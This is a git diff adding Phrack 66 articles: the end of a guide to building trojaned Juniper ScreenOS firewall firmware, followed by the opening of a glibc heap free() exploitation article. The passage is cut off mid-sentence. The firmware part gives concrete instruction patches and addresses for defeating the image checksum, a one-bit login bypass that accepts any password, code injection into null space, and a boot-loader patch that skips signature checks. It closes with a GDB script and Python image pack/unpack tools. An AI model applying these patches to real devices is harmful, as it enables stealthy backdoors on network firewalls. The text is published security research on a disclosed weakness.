+firmware size - 79 bytes. But we do not yet know how the checksum field is
+calculated. To obtain the checksum algorithm we need to disassemble the
+uncompressed blob we have from decompressing the firmware. We will now
+discuss disassembling the binary and then move onto addressing the
+checksum issue.
+
+--[ 0x7 - Autopsy
+
+The uncompressed blob is an approximately 20Mb binary.  We want to load
+the binary into IDA (a disassembler with PowerPC support) but we need a
+loading address so that relative addresses within the program point to the
+correct memory locations. Initially the binary was loaded at address
+0x00000000 but it is obvious that pointers to strings are not referencing
+the beginning of strings.
+
+The uncompressed blob contains a header with similarities to the
+compressed firmware header. The header fields contain a virtual address
+and a header size. If we subtract the header size from the virtual address
+we have the loading address.
+
+Uncompressed Blob Header
+
+		signature	offset		address
+00000000:	EE16BA81	00010110	00000020 	00060000
+
+ScreenOS Loading Address = 0x00060000 - 0x00000020 =  0x0005FFE0
+
+This can be confirmed with live debugging by using GDB and querying the 
+memory at 0x0005FFE0 to check that the signature bytes 0xEE16BA81 are at 
+that memory location.
+
+We can now rebase the program in IDA to use the correct loading address.
+Now we have a correctly loaded binary but we do not know anything about
+the structure of the binary or the sections it may contain as the binary
+is not a recognised executable type. Code and data were marked using IDC
+scripts which searched for function prologs (0x9421F*) and string cross
+references.  The approximate segments of the binary found by scripting and
+manual examination are sketched out in the very simplified illustration
+below:
+
+                               
+0x0005ffe0	/-------------------------\ 
+						|       HEADER &          |
+						|       SCREENOS CODE     |
+0x00c40000	|-------------------------|
+						|       SCREENOS DATA     |
+0x00f0efd8	|-------------------------|
+         		|					FILES	  |
+0x011ddab4	|-------------------------|
+						|     	BOOT LOADER CODE  |
+0x011f2b4e	|-------------------------|
+						|     	BOOT LOADER DATA  |
+0x0140e04c	|-------------------------|
+						|       0xFFs             |
+0x014171cf	|-------------------------|   
+						|   other stuff		  |
+						\-------------------------/
+
+To build up a picture of the binary it is useful to search for functions 
+such as str_cmp, file_read, file_write etc and use error strings to 
+identify and name functions in IDA.
+
+The boot loader can be cut out and disassembled separately with a loading 
+address of 0x00000000.
+
+
+--[ 0x8 - Netscreen of the Dead
+
+At this stage we are now ready to construct a ScreenOS Trojaned Firmware. 
+Any trojan has three basic requirements:
+
+1. Delivery: It must be able to be installed remotely.
+2. Access: It must provide remote access / communication. 
+3. Payload: It must provide attacker supplied code execution. 
+
+During this research all modification of the ScreenOS binary to construct
+the trojaned version was hand crafted assembly inserted via hex editing
+the binary firmware. 
+
+1. First Bite [ Delivery ]
+Unlike loading a firmware over a serial console at boot time, the 
+checksum and size fields in the header are checked when images are loaded 
+over the network via TFTP or the Web interface
+
+00000000: EE16BA81 00110A12 00000020 02860000
+00000010: 004E6016 15100050 29808000 C72C15F7	<-CHECKSUM
+
+The checksum is calculated as part of the image loading sequence and a 
+disassembly of the relevant function is shown below...but on firmware
+loading any bad header checksum value is printed to the console with an 
+error message. 
+
+If we binary modify the firmware to print out the correct checksum value
+we would have a 'checksum calculator' firmware which we can load modified
+firmware against to calculate valid checksums. So we don't have to
+calculate or reverse engineer the checksum algorithm. This checksum
+calculator firmware can be loaded over serial console and new images we
+need to calculate the checksum for are loaded over TFTP. The correct
+checksum will then be output to the console. This correct header value can
+then be inserted into the firmware header by direct hex editing of the
+image file.
+
+With a correct checksum field we can now load modified images via tftp and
+the web interface.
+
+Below is the ScreenOS code we need to modify to create a checksum 
+calculator image.
+
+008B60E4  lwz  %r4, 0x1C(%r31) 		# %r4 contains header checksum
+008B60E8  cmpw %r3, %r4        		# %r3
+contains calculated checksum
+008B60EC  beq  loc_8B6110      		# branch away if checksums matched
+008B60F0  lis  %r3, aCksumXSizeD@h 	# " cksum :%x size :%d\n"
+008B60F4  addi %r3, %r3, aCksumXSizeD@l
+008B60F8  lwz  %r5, 0x10(%r31)
+008B60FC  bl   Print_to_Console 	# %r4 is printed to console
+008B6100  lis  %r3, aIncorrectFirmw@h 	# "Incorrect firmware data"
+008B6104  addi %r3, %r3, aIncorrectFirmw@l
+008B6108  bl   Print_to_Console
+
+
+If we replace 
+
+	008B60E8  cmpw %r3, %r4        	# %r3 contains calculated checksum
+
+with
+
+	008B60EC mr   %r4,%r3         	# print out calculated checksum
+
+we have our checksum calculator firmware. 
+
+For interested readers two checksum algorithms were identified at
+addresses and reverse engineering of these is certainly possible.
+
+One Bit{e} [ Access ] 
+The most stealthy and elegant backdoor is to subvert the existing login 
+mechanism. It may be possible to spawn a shell on another external port
+but this may be noticed from an external scan of the appliance and 
+compromises the stealthiness of the trojaned firmware so further research 
+into this was not carried out. 
+
+Serial console, Telnet, Web and SSH all compare password hashes and use
+the same function for that comparison. Additionally SSH falls back to
+password authentication if the client does not supply a key, unless
+password authentication has been explicitly disabled. 
+
+A one bit patch to the firmware provides a login with any password if a 
+valid username is supplied.
+
+003F7F04  mr    %r4, %r27
+003F7F08  mr    %r5, %r30
+003F7F0C  bl    COMPARE_HASHES  	# does a string compare
+003F7F10  cmpwi %r3, 0               	# equal if match
+003F7F14  bne   loc_3F7F24  		# login fails if not equal (branch)
+003F7F18  li    %r0, 2
+003F7F1C  stw   %r0, 0(%r29)
+003F7F20  b     loc_3F7F28
+
+
+If we replace 
+
+	003F7F10  cmpwi %r3, 0		# equal if match
+
+with
+
+	0x397F30 cmpwi %r3, 1           # equal if they don't match
+
+then any password EXCEPT a valid password will provide a login. 
+
+We could patch
+
+	003F7F14 bne   loc_3F7F24  	# login fails if not equal (branch)
+
+to 
+
+	003F7F14 bl   loc_3F7F24  	# login never fails (branch)
+
+to allow any password with a valid username to work.
+
+
+Infection [ Payload ]
+
+The last step for our working trojan is to be able to inject code into the
+firmware. First we need to find somewhere to inject the code we want
+executed. The ScreenOS code section contains a block of nulls large enough
+to include useful functionality at address 0x0031b4ac to 0x0031b4b0
+
+First we write our desired functionality in PowerPC assembly and replace a
+chunk of nulls with the hex values of the assembly opcodes.
+
+The steps to execute this code are:
+- Patch a branch in ScreenOS to call our code
+- Run our injected code which can potentially call ScreenOS functions
+- Branch back to callee
+
+This code can be injected at address 0x002BB4E0 in the firmware and called
+from the login function of ScreenOS: 
+
+
+003F7F04 mr      %r4, %r27					
+003F7F08 mr      %r5, %r30
+003F7F0C bl      GET_HASHED_PASS	# patch this to call our code
+003F7F10 cmpwi   %r3, 0          
+003F7F14 bne     loc_3F7F24
+003F7F18 li      %r0, 2
+003F7F1C stw     %r0, 0(%r29)
+003F7F20 b       loc_3F7F28
+
+so 
+
+003f7f0c bl	GET_HASHED_PASS
+
+becomes
+
+003f7f0c bl	0x31b4c0
+
+which will jump to the location containing the injected code.  To inject
+code the PowerPC architecture features such as flat memory model, fixed
+width 4 byte instructions and the link register make this fairly
+straightforward to implement. A very simple proof of concept example,
+which prints out a string to the console on every login, is provided
+below:
+
+stwu 	%sp, 	-0x20(%sp)	# reserve some stack space
+mflr 	%r0			# minimal function prolog
+lis  	%r3, 	string_msb_address	# load half of string 
+addi 	%r3, 	%r3, 	string_lsb_address  # load second half of string
+bl   	Print_To_Console	# call ScreenOS function
+mtlr 	%r0		
+addi 	%sp, 0x20		#minimal function epilog
+bl   	callee_function		# branch back to calling function
+
+As PowerPC has a fix instruction size of 4 bytes to load a 4 byte string 
+we need two instructions. The first loads the most significant bytes -
+2 bytes for load instruction into register and 2 bytes of string, the 
+second adds the least significant bytes to the register to give us 4 byte 
+string. 
+
+This asssembly is then translated in hex and patched into the firmware 
+using a hex editor at absolute address 0x002bb4e0 overwriting existing 
+nulls bytes:
+
+0x002bb4b0: 93DFCAC4 4BD48E69 80010014 7C0803A6
+0x002bb4c0: 83C10008 83E1000C 38210010 4E800020
+0x002bb4d0: 00000000 00000000 00000000 00000000
+0x002bb4e0: 9421FFE0 7C0802A6 3C6000C4 386321BC	<---- 
+0x002bb4f0: 488ED7E9 60630001 7C0803A6 38210020	injected code
+0x002bb500: 480DCA31 00000000 00000000 00000000	->
+0x002bb510: 00000000 00000000 00000000 00000000
+
+From reverse engineering we have identified a ScreenOS function which 
+prints strings to the console. So here we have new functionality injected
+into the ScreenOS firmware which has new code but also calls builtin 
+ScreenOS functionality. The string loaded can be one already existing in 
+ScreenOS or a new one injected somewhere into the null byte area.
+ 
+Every time a user logins the string will be output to the serial console.
+
+--[ 0x9 - Zombie Loader
+
+ScreenOS does include a facility to validate firmware images and all 
+Juniper firmware images are signed. Crucially though the validating 
+certificate is NOT installed by default on any Netscreen AND anyone with
+administrator rights can delete and install the certifcate. To enable 
+firmware image authentication it is necessary to obtain the certificate 
+from the Juniper website and then upload the certificate to the device 
+using the following command:
+
+	save image-key tftp 129.168.0.40 image-key.cer
+
+In the example above image-key is the certificate to be uploaded from the 
+tftp server with IP address 192.168.0.40. Note the insecure transport
+mechanism for a cryptographic key. This is vulnerable to a man in the
+middle attack.
+
+The firmware authentication check code is present in the boot loader which
+we can modify to authenticate all firmware images or only non-Juniper 
+images. It may also be possible to sign firmware with our own certificate
+and upload this to the Netscreen to be used for validation.
+
+Patching the Boot Loader to bypass certificate authentication.
+To bypass the firmware authentication check only one branch instruction 
+needs to be patched:
+
+beq -> bl 		0x4182001C -> 0x4800001C
+
+0000D68C  bl      sub_98B8
+0000D690  cmpwi   %r3, 0     	# %r3 has result of image validation
+0000D694  beq     loc_D6B0 			# branch if passed
+0000D698  lis     %r3, aBogusImageNotA@h 	# image not authenticated
+0000D69C  addi    %r3, %r3, aBogusImageNotA@l
+0000D6A0  crclr   4*cr1+eq
+0000D6A4  bl      sub_C8D0
+0000D6A8  li      %r31, -1
+0000D6AC  b       loc_D6E0
+
+If we replace 
+
+0000D694  beq     loc_D6B0   	# branch if passed
+
+with
+	
+0000D694 bl      loc_D6B0   	# always branch, all images authenticated
+
+or this
+
+0000D694 bne     loc_D6B0   	# evil...only bogus images authenticated
+
+we can successfully load modified firmware even if a Juniper certificate
+is installed on the device. The boot loader is automatically upgraded when
+an image is loaded if the new boot loader differs from the existing.
+
+In summary the steps to bypass firmware authentication are:
+
+1. Delete certificate if one has been uploaded using the command:  
+	
+	ns5xt>delete crypto auth-key
+
+2. Upload the modified firmware image including modified boot loader.
+
+3. Upload the certificate using:
+
+	ns5xt>save image-key tftp 192.168.0.21 imagekey.cer
+
+--[ 0xA - 28 Hacks Later
+
+A more useful trojaned firmware can perform numerous functions leveraging 
+existing ScreenOS functionality such as 
+- loading a hidden shadow configuration file
+- allowing all traffic from one IP through the Netscreen to the network
+- a network traffic tap
+- persistent infection via boot loader on a firmware upgrade
+- client side attacks against Administrators via Javascript code injection
+ into the web console
+
+
+--[ 0xB - Closing Scene
+
+If unauthorised access is gained to a device running ScreenOS it is
+possible for an attacker to replace the boot loader and operating system
+with a modified version which is undetectable except by off line
+comparison with a known image. 
+
+Juniper in-memory infection.
+
+A very stealthy attack is also possible due to a feature of ScreenOS. When
+loading a firmware over serial console two options are provided:
+1. Save firmware to flash and then run new firmware.
+2. Just run new firmware without saving to flash.
+
+In the second case the modified firmware will be wiped on reboot and the 
+previously stored firmware will be run. After a reboot no trace of the 
+modified firmware will be left. 
+
+These attacks are straightforward for an attacker anywhere in the supply
+chain (ie vendors. manufacturers) or someone with physical access (ie
+third party support). If an administrator uses TFTP or HTTP to upgrade a
+Netscreen it is also possible to conduct a man-in-the-middle attack and
+replace the firmware being uploaded with a modified version on the wire.  
+
+These attacks could be prevented by Juniper pre-installing a certificate 
+for image authentication which can not be deleted or modified.
+
+
+--[ 0xC - References
+
+- Juniper JTAC Bulletin PSN-2008-11-111
+ScreenOS Firmware Image Authenticity Notification
+"All Juniper ScreenOS Firewall Platforms are susceptible to 
+circumstances in which a maliciously modified ScreenOS image can 
+be installed."
+	
+http://www.securelink.nl/nl/x/123/ScreenOS-Firmware-Image-Authenticity-
+Notification
+
+--[ 0xD - Credits
+George Romero, antic0de, the belgian, hawkes, zadig, lenny, mark, andy, 
+ruxcon, kiwicon, +Mammon, +Orc
+
+
+--[ 0xE Adddendum: 
+
+---------------------------------------------------------------------------
+~/.gdbinit for remote PowerPC debugging
+---------------------------------------------------------------------------
+#--------------remote connect command over USB serial link-----------------
+define netscreen
+	set height 0
+	set logging on
+	target remote /dev/ttyUSB0
+end
+#--------------------breakpoint aliases------------------------------------
+define bpl
+	info breakpoints
+end
+
+define bpc
+	clear $arg0
+end
+
+define bpe
+	enable $arg0
+end
+
+define bpd
+	disable $arg0
+end
+
+#--------------------process information-----------------------------------
+define stack
+	info stack
+	info frame
+	info args
+	info locals
+end
+
+define reg
+    printf " r00:%08X r01:%08X r02:%08X r03:%08X", $r0, $r1, $r2, $r3
+    printf " \t pc:%08X\n", $pc
+    printf " r04:%08X r05:%08X r06:%08X r07:%08X\n", $r4, $r5, $r6, $r7
+    printf " r08:%08X r09:%08X r10:%08X r11:%08X", $r8, $r9, $r10, $r11
+    printf " \t lr:%08X\n", $lr
+    printf " r12:%08X r13:%08X r14:%08X r15:%08X\n", $r12, $r13, $r14, $r15
+    printf " r16:%08X r17:%08X r18:%08X r19:%08X", $r16, $r17, $r18, $r19
+    printf " \tctr:%08X\n", $ctr	
+    printf " r20:%08X r21:%08X r22:%08X r23:%08X\n", $r20, $r21, $r22, $r23
+    printf " r24:%08X r25:%08X r26:%08X r27:%08X", $r24, $r25, $r26, $r27
+    printf " \t cr:%08X\n",$cr
+    printf " r28:%08X r29:%08X r30:%08X r31:%08X", $r28, $r29, $r30, $r31
+    printf " \txer:%08X\n", $xer
+end
+
+define func
+	info functions
+end
+
+define var
+	info variables
+end
+
+define lib
+	info sharedlibrary
+end
+
+define sig
+	info signals
+end
+
+define threadice
+	info threads
+end
+
+define u
+	info udot
+end
+
+define dis
+	disassemble $arg0
+end
+
+
+#------------------------------hex/ascii dump address----------------------
+define hexdump
+    printf "%08X : ", $arg0
+    printf "%02X %02X %02X %02X  %02X %02X %02X %02X", *(unsigned char*) / 
+($arg0), *(unsigned char*)($arg0 + 1),*(unsigned char*)($arg0+2), / 
+*(unsigned char*)($arg0 + 3),*(unsigned char*)($arg0+4), *(unsigned char*)/
+ ($arg0 + 5),*(unsigned char*)($arg0+6), *(unsigned char*)($arg0 + 7)
+    printf " - "
+    printf "%02X %02X %02X %02X  %02X %02X %02X %02X",*(unsigned char*) / 
+($arg0+8), *(unsigned char*)($arg0 + 9),*(unsigned char*)($arg0+10), / 
+*(unsigned char*)($arg0 + 11),*(unsigned char*)($arg0+12), / 
+*(unsigned char*)($arg0 + 13),*(unsigned char*)($arg0+14), /
+*(unsigned char*)($arg0 + 15)
+    printf " %c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c\n",*(unsigned char*)($arg0),/
+ *(unsigned char*)($arg0 + 1),*(unsigned char*)($arg0+2), / 
+*(unsigned char*)($arg0 + 3),*(unsigned char*)($arg0+4), / 
+*(unsigned char*)($arg0 + 5),*(unsigned char*)($arg0+6), / 
+*(unsigned char*)($arg0 + 7),*(unsigned char*)($arg0+8), /
+*(unsigned char*)($arg0 + 9),*(unsigned char*)($arg0+10),/
+ *(unsigned char*)($arg0 + 11),*(unsigned char*)($arg0+12), /
+*(unsigned char*)($arg0 + 13),*(unsigned char*)($arg0+14), /
+*(unsigned char*)($arg0 + 15)
+end
+
+#------------------------------hex dump address---------------------------
+define memdump
+	printf "%02X%02X%02X%02X%02X%02X%02X%02X", *(unsigned char*)/
+($arg0), *(unsigned char*)($arg0 + 1),*(unsigned char*)($arg0+2), /
+*(unsigned char*)($arg0 + 3),*(unsigned char*)($arg0+4), /
+*(unsigned char*)($arg0 + 5),*(unsigned char*)($arg0+6), /
+*(unsigned char*)($arg0 + 7)
+    printf "%02X%02X%02X%02X%02X%02X%02X%02X\n",*(unsigned char*)/
+($arg0+8), *(unsigned char*)($arg0 + 9),*(unsigned char*)($arg0+10),/
+ *(unsigned char*)($arg0 + 11),*(unsigned char*)($arg0+12),/
+ *(unsigned char*)($arg0 + 13),*(unsigned char*)($arg0+14),/
+ *(unsigned char*)($arg0 + 15)
+end
+
+
+#----------------------------process context-------------------------------
+define context
+	printf "\n"
+	printf "powerpc\n"
+	printf "---------------------------------"
+	printf "--------------------------------------[regs]\n"
+	reg
+	printf "\n"
+	printf "[%08X]---------------------", $r1
+	printf "--------------------------------------[stack]\n"
+	hexdump $r1+64
+	hexdump $r1+48
+	hexdump $r1+32
+	hexdump $r1+16
+	hexdump $r1
+	hexdump $r1-16
+	hexdump $r1-32
+	hexdump $r1-48
+	hexdump $r1-64
+	printf "\n"
+	printf "[%08X]---------------------", $pc
+	printf "----------------------------------[code]\n"
+	x /16i $pc
+	printf "---------------------------------"
+	printf "-------------------------------------\n"
+end
+
+
+#--------------------------process control---------------------------------
+define n
+    ni
+    context
+end
+
+define c
+    continue
+    context
+end
+
+define go
+    stepi $arg0
+    context
+end
+
+define goto
+    tbreak $arg0
+    continue
+    context
+end
+
+define pret
+    finish
+    context
+end
+
+define startice
+    tbreak _start
+    r
+    context
+end
+
+define main
+    tbreak main
+    r
+    context
+end
+
+define find
+    set $start = (char *) $arg0
+    set $end = (char *) $arg1
+    set $pattern = (int) $arg2
+    set $p = $start
+    while $p < $end
+	if (*(int *) $p) == $pattern
+	    printf "pattern 0x%x found at 0x$x\n", $pattern, $p
+	end    
+	set $p++
+    end
+end
+
+#--------------------------gdb options-------------------------------------
+set confirm 0
+set verbose off
+set prompt gdb-ppc>
+set output-radix 0x10
+set input-radix 0x10
+
+
+---------------------------------------------------------------------------
+ScreenOS pack & unpack python scripts
+---------------------------------------------------------------------------
+#!/usr/local/bin/python
+#
+# nodunpack.py :: ScreenOS image unpacker 
+#
+#
+# IMPORTANT:
+# requires LZMA utilities
+#
+import sys
+import subprocess
+
+class sosunzip:
+
+    def init():
+        self.header
+        self.image
+        self.packed
+	self.out
+
+    def unpack(self):
+
+	print "Cutting off header and saving"
+	f = open(self.packed, 'rb')
+	fh = file(self.header, 'w+b')
+	fb = file(self.image, 'w+b')
+    
+	# save header including 4 magic bytes for lzma blob
+	head = f.read(0x00012c04)
+	fh.write(head)
+	fh.close()
+	print "Header extracted"
+	
+	# save lzma blob
+	f.seek(0x00012c04)
+	blob = f.read()
+	fb.write(blob)
+	f.close()
+	fb.close()
+	print "lzma blob extracted"
+	
+	# fast way
+	# fb = open(self.image, 'r+b')
+	# buf = fb.read().replace(oldhead,newhead)
+	# fb.seek(0x0)
+	# fb.write(buf)
+	# fb.close()
+	
+	# correct dictionary size
+	fb = open(self.image, 'r+b')
+	fb.seek(0x01)
+	print "Correcting dictionary size 00008000"
+	fb.write(chr(0x00) + chr(0x00) + chr(0x80) + chr(0x00))
+	
+	# read header and lzma blob
+	fb.seek(0x0)
+	head = fb.read(0x05)
+	fb.seek(0x05)
+	lzma = fb.read()
+	
+	# write outheader, unknown size and lzma blob
+	fb.seek(0x00)
+	fb.write(head)
+	print "Adding uncompressed size: 0xffffffffffffffff"
+	fb.write(chr(0xff)+chr(0xff)+chr(0xff)+chr(0xff)+chr(0xff)+chr / 
+						(0xff)+chr(0xff)+chr(0xff))
+	fb.write(lzma)
+	fb.close()
+    
+	print ("Uncompressing LZMA blob...")
+	mkimage = "".join(['lzcat ',self.image,' > ',self.out])
+	subprocess.call(mkimage, shell=True)
+	print "lzcat: Blob decompressed (decoder error is safe to ignore)" 
+	print "ScreenOS image file decompressed"
+  
+if __name__ == '__main__':
+  
+    if len(sys.argv) != 4:
+	print "Usage: ./sunpack.py <packed-image> <out-header> <out-image>"
+	sys.exit(1)
+    else:
+	s = sosunzip()
+	s.packed = sys.argv[1]
+	s.header = sys.argv[2]
+	s.out = sys.argv[3]
+	s.image = "".join([sys.argv[3],'.lzma'])   
+	s.unpack()
+    
+    sys.exit(0)
+
+
+#!/usr/local/bin/python
+#
+# nodpack.py :: ScreenOS image packer 
+#
+# 
+# IMPORTANT:
+# requires LZMA utilities installed!
+#
+import sys
+import subprocess
+
+class soszip:
+
+    def init():
+        self.header
+        self.image
+        self.packed
+
+    def pack(self):
+  
+	print ("Compressing with LZMA...")
+	mklzma = "".join(["lzma", " -5 ",self.image])
+	subprocess.call(mklzma,shell=True)
+
+	print("Adding header to LZMA blob...")
+	mkimage = "".join(['cat ',self.header,' ',self.image,'.lzma > / 
+							',self.packed])
+	subprocess.call(mkimage, shell=True)
+    
+	print "Fixing dictionary size 0x00012c05: 00008000 -> 00200000"
+	f = open(self.packed, 'r+b')
+	f.seek(0x00012c05)
+	f.write(chr(0x00)+ chr(0x20) + chr(0x00)+ chr(0x00))
+	#seek to start of file
+	f.seek(0x0)
+	head = f.read(0x00012c09)
+	print "Removing uncompressed size 0x00012c09: [8 bytes]"
+	#seek past the field to remove
+	f.seek(0x00012c11)
+	bub = f.read()
+	# rewrite the file
+	f.seek(0x0)
+	f.write(head)
+	f.write(bub)
+	f.truncate()
+	f.close()
+    
+	print "ScreenOS image file created"
+  
+if __name__ == '__main__':
+  
+    if len(sys.argv) != 4:
+	print "Usage: ./nodpack.py <header> <image> <screenos-image>"
+	sys.exit(1)
+    else:
+	s = soszip()
+	s.header = sys.argv[1]
+	s.image = sys.argv[2]
+	s.packed = sys.argv[3]   
+	s.pack()
+    
+    sys.exit(0)
+
+--------[ EOF
diff --git a/phrack66/6.txt b/phrack66/6.txt
new file mode 100644
index 0000000..3b80015
--- /dev/null
+++ b/phrack66/6.txt
@@ -0,0 +1,1593 @@
+				==Phrack Inc.==
+
+		Volume 0x0d, Issue 0x42, Phile #0x06 of 0x11
+
+|=-----------------------------------------------------------------------=|
+|=-------------=[ Yet another free() exploitation technique ]=-----------=|
+|=-----------------------------------------------------------------------=|
+|=---------------=[    By huku                           ]=--------------=|
+|=---------------=[                                      ]=--------------=|
+|=---------------=[    huku <huku _at_ grhack _dot_ net  ]=--------------=|
+|=-----------------------------------------------------------------------=|
+
+
+---[ Contents
+
+I. Introduction
+II. Brief history of glibc heap exploitation
+III. Various facts regarding the glibc malloc() implementation
+  1. Chunk flags
+  2. Heaps, arenas and contiguity
+  3. The FIFO nature of the malloc() algorithm
+  4. The prev_size under our control
+  5. Debugging and options
+IV. In depth analysis on free()'s vulnerable paths
+  1. Introduction
+  2. A trip to _int_free()
+V. Controlling unsorted_chunks() return value
+VI. Creating fake heap and arena headers 
+VII. Putting it all together
+VIII. The ClamAV case 
+  1. The bug
+  2. The exploit
+IX. Epilogue
+X. References
+XI. Attachments
+
+
+---[ I. Introduction
+
+When articles [01] and [02] were released in Phrack 57, heap
+exploitation techniques became a common fashion. Various heap
+exploits were, and are still published on various security related
+lists and sites. Since then, the glibc code, and especially malloc.c,
+evolved dramatically and eventually, various heap protection schemes
+were added just to make exploitation harder.
+
+This article presents a new free() exploitation technique, different
+from those published at [06]. Yet, knowledge of [06] is assumed,
+as several concepts presented here are derived from the author's
+writings. Our technique makes use of 4 malloc() chunks (either
+directly allocated or fake ones constructed by the attacker) and
+achieves a '4 bytes anywhere' result. Our study focuses on the
+current situation of the glibc malloc() code and how one can bypass
+the security measures it imposes. The first two sections act as a
+flash back and as a rehash of older knowledge. Several important
+aspects regarding malloc() are also discussed. The aforementioned
+sections act as a foundation for the sections to follow. Finally,
+a real life scenario on ClamAV is presented as demonstration for
+our technique.
+
+The glibc versions revised during the analysis were 2.3.6, 2.4, 2.5
+and 2.6 (the latest version at the time of writing). Version 2.3.6
+was chosen due to the fact that glibc versions greater or equal to
+2.3.5 include additional security precautions. Examples were not
+tested on systems running glibc 2.2.x since it is considered quite
+obsolete.
+
+This article assumes basic knowledge of malloc() internals as they
+are described in [01] and [02]. If you haven't read them yet then
+probably you should do so now. The reader is also urged to read
+[03], [04] and [05]. Experience on real life heap overflows is also
+suggested but not required.
+
+
+---[ II. Brief history of glibc heap exploitation
+
+It is of common belief that the first person to publicly talk about
+heap overflows was Solar Designer back in the July of 2000. His
+related advisory [07], introduced the unlink() technique which was
+also characterized as a non-trivial process. By that time, Solar
+Designer wouldn't even imagine that this would be the start of a
+new era in exploitation methods. It was only a year later, in the
+August of 2001, when a more formal standardization of the term 'heap
+overflow' essentially appeared, right after the release of Phrack
+articles [01] and [02] written by MaXX and anonymous respectively.
+In his article, MaXX admitted that the technique Solar Designer had
+published, was already known 'in the wild' and was successfully
+used on programs like Netscape browsers, traceroute, and slocate.
+A huge volume of discoveries and exploits utilizing the disclosed
+techniques hit the lights of publicity. Some of the most notable
+research done at that time were [03], [04] and [05].
+
+In December 2003, Stefan Esser replies to some, innocent at the
+first sight, mail [08] announcing the availability of a dynamic
+library that protects against heap overflows. His own solution is
+very simple - just check that the 'fd' and 'bk' pointers are actually
+pointing where they should. His idea was then adopted by glibc-2.3.5
+along with other sanity checks thus rendering the unlink() and
+frontlink() techniques useless. The underground, at that time,
+assumes that pure malloc() heap overflows are gone but researchers
+sit back and start doing what they knew best, audit. The community
+remained silent for a long time. It is obvious that certain 0day
+techniques were developed but people appreciated their value and
+denied their disclosure.
+
+Fortunately, two persons decided to shed some light on the malloc()
+case. In 2005, Phatantasmal Phatasmagoria (the person responsible
+for the disclosure of the wilderness chunk exploitation techniques
+[09]) publishes the 'Malloc Malleficarum' [06]. His paper introduces
+5 new ways of bypassing the restrictions imposed by the latest glibc
+versions and is considered quite a masterpiece even today. In May
+the 27th 2007, g463 publishes [10], a very interesting paper
+describing a new technique exploiting set_head() and the topmost
+chunk. With this method, one could achieve an 'almost 4 bytes almost
+anywhere' condition. In this article, g463 explains how his technique
+can be used to flip the heap onto the stack and proves it by coding
+a neat exploit for file(1). The community receives another excellent
+paper which proves that exploitation is an art.
+
+But enough about the past. Before entering a new chapter of the
+malloc() history, the author would like to clarify a few details
+regarding malloc() internals. It's actually the very basis of what
+will follow.
+
+
+---[ III. Various facts regarding the glibc malloc() implementation
+
+--[ 1. Chunk flags
+
+Probably, you are already familiar with the layout of the malloc()
+chunk header as well as with its 'size' and 'prev_size' fields.
+What is usually overlooked is the fact that apart from PREV_INUSE,
+the 'size' field may also contain two more flags, the IS_MMAPPED
+and the NON_MAIN_ARENA, the latter being the most interesting one.
+When the NON_MAIN_ARENA flag is set, it indicates that the chunk
+is part of an independent mmap()'ed memory region.
+
+--[ 2. Heaps, arenas and contiguity
+
+The malloc() interface does not guarantee contiguity but tries to
+achieve it whenever possible. In fact, depending on the underlying
+architecture and the compilation options, contiguity checks may not
+even be performed. When the system is hungry for memory, if the
+main (the default) arena is locked and busy serving other requests
+(requests possibly coming from other threads of the same process),
+malloc() will try to allocate and initialize a new mmap()'ed region,
+called a 'heap'. Schematically, a heap looks like the following
+figure.
+
+  ...+----------+-----------+---------+-...-+---------+...
+     | Heap hdr | Arena hdr | Chunk_1 |     | Chunk_n |
+  ...+----------+-----------+---------+-...-+---------+...
+
+The heap starts with a, so called, heap header which is physically
+followed by an arena header (also called a 'malloc state' or just
+'mstate'). Below, you can see the layout of these structures.
+
+--- snip ---
+typedef struct _heap_info {
+  mstate ar_ptr;           /* Arena for this heap   */ 
+  struct _heap_info *prev; /* Previous heap         */
+  size_t size;             /* Current size in bytes */
+  size_t mprotect_size;    /* Mprotected size       */
+} heap_info;
+--- snip ---
+
+--- snip ---
+struct malloc_state {
+  mutex_t mutex;                   /* Mutex for serialized access */
+  int flags;                       /* Various flags               */
+  mfastbinptr fastbins[NFASTBINS]; /* The fastbin array           */
+  mchunkptr top;                   /* The top chunk               */
+  mchunkptr last_remainder;        /* The rest of a chunk split   */
+  mchunkptr bins[NBINS * 2 - 2];   /* Normal size bins            */
+  unsigned int binmap[BINMAPSIZE]; /* The bins[] bitmap           */
+  struct malloc_state *next;       /* Pointer to the next arena   */
+  INTERNAL_SIZE_T system_mem;      /* Allocated memory            */
+  INTERNAL_SIZE_T max_system_mem;  /* Max memory available        */
+};
+
+typedef struct malloc_chunk *mchunkptr;
+typedef struct malloc_chunk *mbinptr;
+typedef struct malloc_chunk *mfastbinptr;
+--- snip ---
+
+The heap header should always be aligned to a 1Mbyte boundary and
+since its maximum size is 1Mbyte, the address of a chunk's heap can
+be easily calculated using the following formula.
+
+--- snip ---
+#define HEAP_MAX_SIZE (1024*1024)
+
+#define heap_for_ptr(ptr) \
+ ((heap_info *)((unsigned long)(ptr) & ~(HEAP_MAX_SIZE-1)))
+--- snip ---
+
+Notice that the arena header contains a field called 'flags'. The
+3rd MSB of this integer indicates wether the arena is contiguous
+or not. If not, certain contiguity checks during malloc() and free()
+are ignored and never performed. By taking a closer look at the
+heap header, one can also notice that a field named 'ar_ptr' also
+exists, which of course, should point to the arena header of the
+current heap. Since the arena header physically borders the heap
+header, the 'ar_ptr' field can easily be calculated by adding the
+size of the heap_info structure to the address of the heap itself.
+
+--[ 3. The FIFO nature of the malloc() algorithm
+
+The glibc malloc() implementation is a first fit algorithm (as
+opposed to best fit algorithms). That is, when the user requests N
+bytes, the allocator searches for the first chunk with size bigger
+or equal to N. Then, the chunk is split, and one half (of size N)
+is returned to the user while the other half plays the role of the
+last remainder. Additionally, due to a feature called 'unsorted
+chunks', the heap blocks are returned back to the user in a FIFO
+fashion (the most recently free()'ed blocks are first scanned).
+This may allow an attacker to allocate a chunk within various heap
+holes that may have resulted after calling free() or realloc().
+
+--- snip ---
+#include <stdio.h>
+#include <stdlib.h>
+
+int main() {
+  void *a, *b, *c;
+
+  a = malloc(16);
+  b = malloc(16);
+  fprintf(stderr, "a = %p | b = %p\n", a, b);
+
+  a = realloc(a, 32);
+  fprintf(stderr, "a = %p | b = %p\n", a, b);
+
+  c = malloc(16);
+  fprintf(stderr, "a = %p | b = %p | c = %p\n", a, b, c);
+  
+  free(a);    
+  free(b);    
+  free(c);    
+  return 0;
+}
+--- snip ---
+
+This code will allocate two chunks of size 16. Then, the first chunk
+is realloc()'ed to a size of 32 bytes. Since the first two chunks
+are physically adjacent, there's not enough space to extend 'a'.
+The allocator will return a new chunk which, physically, resides
+somewhere after 'a'. Hence, a hole is created before the first
+chunk. When the code requests a new chunk 'c' of size 16, the
